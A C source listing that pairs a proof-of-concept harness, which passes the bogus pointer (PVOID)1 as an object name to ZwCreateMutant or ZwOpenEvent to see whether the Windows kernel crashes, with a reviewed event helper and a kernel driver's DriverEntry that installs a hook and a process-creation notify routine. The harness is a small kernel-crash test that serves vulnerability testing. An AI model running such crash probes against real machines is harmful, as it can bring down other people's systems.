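/*
 * PoC harness: call ZwCreateMutant / ZwOpenEvent with an OBJECT_ATTRIBUTES
 * whose ObjectName is the bogus user-mode pointer (PVOID)1.
 *
 * If the kernel dereferences ObjectName without probing it, the machine
 * crashes before "TEST FAILED!" is printed.  If the call is rejected cleanly,
 * control comes back here, the NTSTATUS is printed (the original discarded
 * it, leaving a tester with no idea why the probe "failed") and the harness
 * reports failure.
 *
 * argv[1] selects the syscall; Nt/Zw prefixes are accepted, case-insensitive
 * (stricmp is the MSVC CRT spelling).  Returns 1 on every path that gets
 * back to user mode.
 */
int main(int argc, char **argv)
{
    OBJECT_ATTRIBUTES oa;
    HANDLE handle;
    long status;        /* NTSTATUS of the probed call, if the kernel survives */
    const char *fn;

    about();
    if (argc != 2) {
        usage();
        return 1;
    }
    fn = argv[1];

    /* ObjectName = (PVOID)1: an invalid address the kernel must refuse. */
    InitializeObjectAttributes(&oa, (PVOID)1, 0, NULL, NULL);

    if (!stricmp(fn, "NtCreateMutant") || !stricmp(fn, "ZwCreateMutant")) {
        status = ZwCreateMutant(&handle, 0, &oa, FALSE);
    } else if (!stricmp(fn, "NtOpenEvent") || !stricmp(fn, "ZwOpenEvent")) {
        status = ZwOpenEvent(&handle, 0, &oa);
    } else {
        printf("\nI do not know how to exploit the vulnerability using this function.\n");
        printf("\nTEST FAILED!\n");
        return 1;
    }

    /* Still alive: the kernel handled the bogus pointer.  Report what it said. */
    printf("\n%s returned NTSTATUS 0x%08lx\n", fn, (unsigned long)status);
    printf("\nTEST FAILED!\n");
    return 1;
}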
/*
 * Open an existing named event.
 *
 * AccessMask: access requested on the event (e.g. EVENT_ALL_ACCESS).
 * Name:       NUL-terminated wide object path; matched case-insensitively.
 *
 * Returns the event handle, or NULL when ZwOpenEvent fails.  The NTSTATUS is
 * not propagated, so a caller cannot tell "not found" from "access denied".
 *
 * NOTE(review): the attributes carry OBJ_CASE_INSENSITIVE only.  If this
 * helper runs in kernel mode (NTAPI and the Zw* call suggest it may), the
 * DriverEntry in this listing also sets OBJ_KERNEL_HANDLE so the handle is
 * not reachable through the calling process' handle table -- confirm which
 * mode this helper serves before relying on it.
 */
HANDLE NTAPI OpenEvent(ULONG AccessMask, PWSTR Name)
{
    UNICODE_STRING path;
    OBJECT_ATTRIBUTES attrs;
    HANDLE h = NULL;

    RtlInitUnicodeString(&path, Name);
    InitializeObjectAttributes(&attrs, &path, OBJ_CASE_INSENSITIVE, 0, 0);

    /* On failure the out-handle may be untouched or clobbered; hand back NULL
     * either way so the caller has a single sentinel to test. */
    if (!NT_SUCCESS(ZwOpenEvent(&h, AccessMask, &attrs)))
        return NULL;
    return h;
}
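/* Guarded so a build that already has ntstatus.h in scope is unaffected; the
 * value is the documented STATUS_NOT_SUPPORTED. */
#ifndef STATUS_NOT_SUPPORTED
#define STATUS_NOT_SUPPORTED ((NTSTATUS)0xC00000BBL)
#endif

/*
 * DriverEntry - driver initialisation.
 *
 * Steps, each recording its PHASE_* in `phase` so a failure can be logged
 * under RegistryPath as MU_REGVAL_LAST_ERROR:
 *   1. signal the MU_EVENTNAME_BOOTSYNC event if it exists (best effort);
 *   2. create the MU_DEVNAME_HOST_CONTROL device;
 *   3. reject every OS other than XP / 2003 / 7 (Vista, 2008 and 2008 R2
 *      deliberately fall through to the default case);
 *   4. load the database, install the kernel hook, register the
 *      process-creation notify routine, start the user-mode helper;
 *   5. install the IRP dispatch routines.
 *
 * On failure the device is deleted and the notify routine removed.  Nothing
 * here tears down the kernel hook from step 4, which is presumably why a
 * failure after PHASE_INIT_KERNEL_HOOK still returns STATUS_SUCCESS: the
 * driver has to stay resident once the hook is live (TODO confirm against
 * MuInitializeKernelHook).  Earlier failures return the error so the I/O
 * manager unloads the driver.
 *
 * Fixes relative to the original:
 *   - the unsupported-OS path left `status` at IoCreateDevice's success, so
 *     the driver returned STATUS_SUCCESS with its device already deleted and
 *     no dispatch routines, and the error was never logged; it now fails
 *     with STATUS_NOT_SUPPORTED;
 *   - the NUL terminator written into RegistryPath->Buffer is now bounded by
 *     MaximumLength (a UNICODE_STRING is counted, not terminated).
 */
NTSTATUS DriverEntry(PDRIVER_OBJECT DriverObject, PUNICODE_STRING RegistryPath)
{
    NTSTATUS status;
    HANDLE event;
    BOOLEAN clean = FALSE;      /* notify routine is registered and needs removal */
    BOOLEAN terminated;         /* RegistryPath->Buffer was NUL-terminated in place */
    PDEVICE_OBJECT devobj;
    ULONG maver, miver, phase;
    UNICODE_STRING dn;
    OBJECT_ATTRIBUTES oa;

    /* Boot-sync event: wake whoever waits on it, if it exists.  OBJ_KERNEL_HANDLE
     * keeps the handle out of the current process' handle table. */
    RtlInitUnicodeString(&dn, MU_EVENTNAME_BOOTSYNC);
    InitializeObjectAttributes(&oa, &dn, OBJ_CASE_INSENSITIVE | OBJ_KERNEL_HANDLE, NULL, NULL);
    status = ZwOpenEvent(&event, EVENT_ALL_ACCESS, &oa);
    if (NT_SUCCESS(status)) {
        ZwSetEvent(event, NULL);
        ZwClose(event);
    }

    RtlInitUnicodeString(&dn, MU_DEVNAME_HOST_CONTROL);
    phase = PHASE_CREATE_DEVICE;
    status = IoCreateDevice(DriverObject, 0, &dn, FILE_DEVICE_UNKNOWN, 0, FALSE, &devobj);
    if (NT_SUCCESS(status)) {
        PsGetVersion(&maver, &miver, NULL, NULL);
        OsVersion = (maver << 16) | miver;
        OsVersion |= MmIsThisAnNtAsSystem() ? 0x80000000 : 0;   /* top bit: server system */

        phase = PHASE_CHECK_OS_VERSION;
        switch (OsVersion) {
        case VER_WINXP:
        case VER_WIN2K3:
        case VER_WIN7:
            break;
        case VER_WIN2K8R2:
        case VER_WIN2K8:
        case VER_VISTA:
            /* fall through: intentionally unsupported */
        default:
            /* Must set a failure code here; see header comment. */
            status = STATUS_NOT_SUPPORTED;
            goto MuDriverEntry_Failure;
        }

        MuInitializeGlobalData(&g_GlobalData);

        phase = PHASE_LOAD_DATABASE;
        status = MuLoadDatabase(&g_GlobalData);
        if (!NT_SUCCESS(status))
            goto MuDriverEntry_Failure;

        phase = PHASE_INIT_KERNEL_HOOK;
        status = MuInitializeKernelHook(&g_GlobalData);
        if (!NT_SUCCESS(status))
            goto MuDriverEntry_Failure;

        phase = PHASE_SET_NOTIFY;
        status = PsSetCreateProcessNotifyRoutine(MuCreateProcessNotify, FALSE);
        if (!NT_SUCCESS(status))
            goto MuDriverEntry_Failure;
        clean = TRUE;

        phase = PHASE_INIT_HELPER;
        status = MuInitializeUserModeHelper(&g_GlobalData);
        if (!NT_SUCCESS(status))
            goto MuDriverEntry_Failure;

        DriverObject->MajorFunction[IRP_MJ_CREATE] = MuDispatchCreateClose;
        DriverObject->MajorFunction[IRP_MJ_CLOSE] = MuDispatchCreateClose;
        DriverObject->MajorFunction[IRP_MJ_POWER] = MuDispatchPower;
        DriverObject->MajorFunction[IRP_MJ_DEVICE_CONTROL] = MuDispatchDeviceControl;
        goto MuDriverEntry_End;

MuDriverEntry_Failure:
        if (clean)
            PsSetCreateProcessNotifyRoutine(MuCreateProcessNotify, TRUE);
        IoDeleteDevice(devobj);
    }

MuDriverEntry_End:
    /* MuDeleteRegistryValue takes a NUL-terminated path, but a UNICODE_STRING
     * is only counted.  Terminate in place only when MaximumLength leaves room
     * for the extra WCHAR; the unconditional write was a one-WCHAR overrun
     * whenever MaximumLength == Length. */
    terminated = (RegistryPath->Length + sizeof(WCHAR) <= RegistryPath->MaximumLength);
    if (terminated)
        RegistryPath->Buffer[RegistryPath->Length / sizeof(WCHAR)] = 0;

    if (NT_SUCCESS(status)) {
        if (terminated)
            MuDeleteRegistryValue(RegistryPath->Buffer, MU_REGVAL_LAST_ERROR);
    } else {
        MuSetErrorCode(RegistryPath, phase, status);
    }

    /* Past the kernel hook the driver stays resident even if a later step
     * failed (see header comment); the failure has already been logged. */
    if (phase > PHASE_INIT_KERNEL_HOOK)
        return STATUS_SUCCESS;
    return status;
}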